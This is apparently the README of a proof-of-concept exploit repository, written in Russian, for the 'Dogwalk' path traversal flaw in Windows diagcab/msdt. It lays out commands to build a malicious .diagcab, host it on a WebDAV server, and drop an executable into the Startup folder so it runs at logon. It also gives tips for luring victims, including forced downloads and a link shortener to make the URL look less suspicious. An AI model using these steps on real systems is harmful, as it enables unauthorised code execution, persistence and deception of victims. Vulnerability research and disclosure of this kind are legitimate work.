
🐾Dogwalk PoC (использование diagcab-файла для получения RCE на Windows)
🚨 Предупреждение 🚨
PoC позволяет атакующему получить удалённое внедрение кода на устройстве жертвы под управлением Windows.
Цель этого репозитория — сделать PoC даже более удобным, чем <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>исходный репозиторий.
НЕ ИСПОЛЬЗУЙТЕ ЕГО БЕЗ ПРЕДВАРИТЕЛЬНОГО РАЗРЕШЕНИЯ!
Что касается нанесённого ущерба и простоты эксплуатации,надеюсь, Microsoft это исправит
Обновление за июль 2022 г.: Microsoft так и не исправила уязвимость в msdt, но Microsoft Defender может её обнаружить
Основная идея: уязвимость обхода пути (path traversal) в технологии Microsoft Diagcab (msdt), которая может привести к удалённому выполнению кода.
Полное описание можно найти в статье в блоге
Об уязвимости сообщалось в течение 2 лет (автор @irsl), и до сих пор нет исправления!
Proof-of-Concept поднимает webdav-сервер, размещающий вредоносный файл .diagcab, который выполняет обход пути (path transversal), чтобы записать вредоносный исполняемый файл в C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Запись исполняемого файла в эту папку приводит к его выполнению при каждом запуске машины пользователем; это называется Boot Logon Autostart Execution.
Итак, в основном нам нужно:
.diagcab.diagcab(💡 используйте заголовок ответа Content-type: application/octet-stream, чтобы браузер автоматически загружал файл при переходе по URL)
Если вам лень (или вы спешите) выполнять шаги по порядку:
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
Иначе ↓↓
.diagcab.diagcfg — это простые XML-файлы, которые содержат ссылки на один или несколько диагностических пакетов и предоставляют метаинформацию о них.diagcab.Сначала создайте custom.diagcfg:
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
И соберите hotfix895214.diagcab:
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
Наконец, переместите его в каталог ./webdav/diagcab-webdav-poc/config
Поместите исполняемый файл, который вы хотите передать на машину жертвы, в каталог ./webdav/malicious... (Здесь мы используем классический calc.exe)
...И запустите сервер:
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
Вредоносный .diagcab доступен по адресу https://[WEBDAV_URL]/config/hotfix895214.diagcab. Теперь вам нужно заманить жертву, чтобы она перешла по этой ссылке.
(💡вы можете использовать сокращатель ссылок, чтобы это выглядело менее подозрительно)
🐾🐾
